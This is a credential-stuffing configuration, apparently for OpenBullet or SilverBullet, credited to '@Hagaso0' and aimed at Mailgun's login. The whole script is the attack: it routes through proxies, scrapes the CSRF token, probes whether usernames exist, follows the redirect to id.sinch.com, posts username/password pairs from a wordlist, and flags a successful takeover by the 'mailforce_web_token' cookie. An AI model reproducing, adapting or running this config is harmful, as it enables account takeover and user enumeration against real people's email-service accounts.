[SETTINGS]
{
  "Name": "Mailgun.com-Hagasoo",
  "SuggestedBots": 80,
  "MaxCPM": 0,
  "LastModified": "2024-07-21T01:37:26.8444569+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Hagaso0",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Mailgun",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Get REQUEST GET "https://login.mailgun.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf_token PARSE "<SOURCE>" LR "('csrf_token', '" "');" -> VAR "TK" 

#Post_User REQUEST POST "https://login.mailgun.com/login/new" Multipart 
  
  STRINGCONTENT "username: <USER>" 
  STRINGCONTENT "csrf_token: <TK>" 
  BOUNDARY "------WebKitFormBoundaryBNsEEOuKe99XX68Z" 
  HEADER "Origin: https://login.mailgun.com" 
  HEADER "Priority: u=1, i" 
  HEADER "Referer: https://login.mailgun.com/login" 
  HEADER "Sec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "This user does not exist" 
  KEYCHAIN Success OR 
    KEY "redirect\":\"/oidc/login\"" 

#Get REQUEST GET "https://login.mailgun.com/oidc/login" AutoRedirect=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Url PARSE "<HEADERS(Location)>" LR "" "" -> VAR "Url" 

IF "<Url>" Contains "<HEADERS(Location)"

#Url PARSE "<HEADERS(location)>" LR "" "" -> VAR "Url" 

ENDIF

#Get REQUEST GET "<Url>" AutoRedirect=FALSE 
  
  HEADER ": scheme:https" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "Priority: u=0, i" 
  HEADER "Referer: https://login.mailgun.com/" 
  HEADER "Sec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 

#Url2 PARSE "<HEADERS(Location)>" LR "" "" -> VAR "Url2" 

#state PARSE "<HEADERS(Location)>" LR "/u/login/password?state=" "" -> VAR "TK2" 

#US_ENC FUNCTION URLEncode "<USER>" -> VAR "US" 

#PS_ENC FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#Post_Data REQUEST POST "https://id.sinch.com<Url2>" 
  CONTENT "state=<TK2>&username=<US>&password=<PS>&action=default" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme:https" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8" 
  HEADER "Priority: u=0, i" 
  HEADER "Referer: https://login.mailgun.com/" 
  HEADER "Sec-Ch-Ua: \"Not/A)Brand\";v=\"8\", \"Chromium\";v=\"126\", \"Google Chrome\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Wrong email or password</span>" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "mailforce_web_token" 

#Author FUNCTION Constant "@Hagaso0" -> CAP "ConfigBy" 

